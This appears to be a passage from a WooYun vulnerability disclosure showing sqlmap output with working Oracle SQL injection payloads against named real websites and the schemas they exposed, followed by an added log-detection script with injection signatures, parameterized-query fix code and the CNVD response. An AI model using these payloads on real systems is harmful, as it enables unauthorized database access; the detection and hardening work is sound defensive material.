Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-9735 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(111)||CH
R(114)||CHR(98)||CHR(58)||CHR(109)||CHR(113)||CHR(112)||CHR(85)||CHR(79)||CHR(99
)||CHR(90)||CHR(109)||CHR(80)||CHR(73)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||C
HR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 2218=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111
)||CHR(106)||CHR(118),5)
---
[07:29:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:29:18] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:29:18] [INFO] fetching database (schema) names
[07:29:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:29:18] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:29:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.lqmyjj.com'
[*] shutting down at 07:29:18


http://www.sxjhjj.com/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.sxjhjj.com/admin_manage/system/mg_editwz.a
sp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:31:40
[07:31:40] [INFO] resuming back-end DBMS 'oracle'
[07:31:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 8957=8957
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 9577=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(104)||CHR(102)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (9577=9577) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-1331 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(104)||CH
R(102)||CHR(105)||CHR(58)||CHR(70)||CHR(75)||CHR(119)||CHR(105)||CHR(67)||CHR(10
8)||CHR(69)||CHR(72)||CHR(106)||CHR(72)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||C
HR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 4658=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(79)
||CHR(121)||CHR(82),5)
---
[07:31:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:31:40] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:31:40] [INFO] fetching database (schema) names
[07:31:40] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:31:40] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:31:40] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.sxjhjj.com'
[*] shutting down at 07:31:40


....
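Every sqlmap run above leaves the same fingerprints in the IIS access log: the `id` parameter stops being a plain number, and the query string carries Oracle-specific fragments (DBMS_PIPE.RECEIVE_MESSAGE, XMLType(...), UNION ALL SELECT, chains of CHR(n)||CHR(n)). The following detection script is an added example and not part of the original report; it scans IIS 6.0 W3C-format log lines (the sample lines are constructed to mirror the requests shown above) and flags requests matching those fragments, a non-numeric `id`, or a sqlmap user agent.

```python
"""Flag likely SQL-injection probes against the CMS in IIS W3C log lines.

Added example, not from the original report. The log lines are constructed
in IIS 6.0 W3C format (spaces in the user agent are written as '+', as IIS
does); the signatures are the payload fragments sqlmap emitted above.
"""
import re
from collections import namedtuple
from urllib.parse import parse_qs, unquote_plus

Finding = namedtuple("Finding", "time client path reasons")

# Constructed sample log: one anonymous sqlmap probe, three payload requests,
# and two benign requests for contrast.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-05-25 07:13:44 10.0.0.5 GET /admin_manage/system/mg_editwz.asp lb=save&id=241 80 - 203.0.113.9 sqlmap/1.0-dev+(http://sqlmap.org) 200
2015-05-25 07:13:44 10.0.0.5 GET /admin_manage/system/mg_editwz.asp lb=save&id=241%20AND%205686%3D5686 80 - 203.0.113.9 Mozilla/5.0 200
2015-05-25 07:13:45 10.0.0.5 GET /admin_manage/system/mg_editwz.asp lb=save&id=241%20AND%204485%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(86),5) 80 - 203.0.113.9 Mozilla/5.0 200
2015-05-25 07:13:46 10.0.0.5 GET /admin_manage/system/mg_editwz.asp lb=save&id=-4202%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(58)||CHR(114)%20FROM%20DUAL-- 80 - 203.0.113.9 Mozilla/5.0 200
2015-05-25 07:14:02 10.0.0.5 GET /index.asp - 80 - 198.51.100.7 Mozilla/5.0 200
2015-05-25 07:14:10 10.0.0.5 GET /admin_manage/cp/Manage_cp.asp page=2 80 - 198.51.100.7 Mozilla/5.0 200
"""

# Payload fragments seen in the sqlmap output, as case-insensitive patterns.
SIGNATURES = {
    "time-based (DBMS_PIPE)": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "error-based (XMLType)": re.compile(r"XMLType\s*\(", re.I),
    "union-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "CHR() concatenation": re.compile(r"CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.I),
    "boolean tautology": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
}

# Parameters the affected pages use as numeric record keys (assumption
# drawn from the URLs in the report).
NUMERIC_PARAMS = {"id"}


def analyse_request(stem, raw_query, user_agent):
    """Return the list of reasons a single request looks like an injection probe."""
    reasons = []
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap user-agent")
    if raw_query == "-":  # IIS writes '-' when there is no query string
        return reasons
    decoded = unquote_plus(raw_query)  # sqlmap URL-encodes spaces and '='
    for name, pattern in SIGNATURES.items():
        if pattern.search(decoded):
            reasons.append(name)
    params = parse_qs(raw_query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"-?\d+", value.strip()):
                reasons.append(f"non-numeric {name}={value[:20]!r}")
    return reasons


def scan_log(text):
    """Parse W3C lines (field order from the #Fields header) and collect findings."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 11:
            continue
        date, time, _sip, _method, stem, query, _port, _user, client, ua, _status = fields[:11]
        reasons = analyse_request(stem, query, ua)
        if reasons:
            findings.append(Finding(f"{date} {time}", client, stem, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.time, f.client, f.path, "; ".join(f.reasons))
```

The non-numeric-`id` rule is the one that generalises: it catches payloads with no recognisable keyword, because every injection point in this report lives in a parameter that should only ever be an integer.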

Proof of vulnerability:

See above (as titled).

Fix recommendation:

Filter input and enforce access control: validate the `id` parameter and enforce backend permission checks on the server side.
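The two defects call for two server-side fixes: the authorization decision must be made on the server rather than by a script the browser can simply not run, and `id` must be validated as an integer and bound as a query parameter instead of concatenated into SQL. The code below is an added example and not the vendor's code; the CMS is classic ASP on Oracle, so Python with an in-memory sqlite3 table (constructed rows) stands in here so that the before/after behaviour can be run stand-alone.

```python
"""Before/after handling of an admin edit page, added example (not the
vendor's code). sqlite3 and the `articles` table are constructed stand-ins
for the Oracle schema behind the real pages.
"""
import re
import sqlite3


def make_db():
    """Constructed sample data: three articles keyed by integer id."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(240, "Notice A"), (241, "Notice B"), (242, "Notice C")],
    )
    return conn


def edit_article_vulnerable(conn, query):
    """Before: no server-side permission check (the login redirect lived in
    client-side JavaScript) and the id is concatenated into the statement."""
    sql = "SELECT id, title FROM articles WHERE id = " + query.get("id", "")
    return 200, conn.execute(sql).fetchall()


def edit_article_hardened(conn, session, query):
    """After: authorization decided from the server-side session, id accepted
    only as a plain integer, and the value bound as a parameter."""
    if not session.get("admin"):
        return 403, []  # reject before touching the database
    raw = query.get("id", "").strip()
    if not re.fullmatch(r"\d{1,10}", raw):
        return 400, []  # anything that is not a bare integer is refused
    rows = conn.execute(
        "SELECT id, title FROM articles WHERE id = ?", (int(raw),)
    ).fetchall()
    return 200, rows


if __name__ == "__main__":
    db = make_db()
    print(edit_article_vulnerable(db, {"id": "241 OR 1=1"}))       # leaks every row
    print(edit_article_hardened(db, {}, {"id": "241"}))             # 403, no session
    print(edit_article_hardened(db, {"admin": True}, {"id": "241 OR 1=1"}))  # 400
    print(edit_article_hardened(db, {"admin": True}, {"id": "241"}))         # 200
```

In the classic ASP original the same shape is an explicit `Session` check at the top of every page under admin_manage/ and an ADODB.Command with a typed input parameter in place of string-built SQL; the integer validation is cheap insurance even once the query is parameterized.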

Copyright notice: please credit the source when reposting: Hero@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-05-30 00:54

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Zhejiang branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet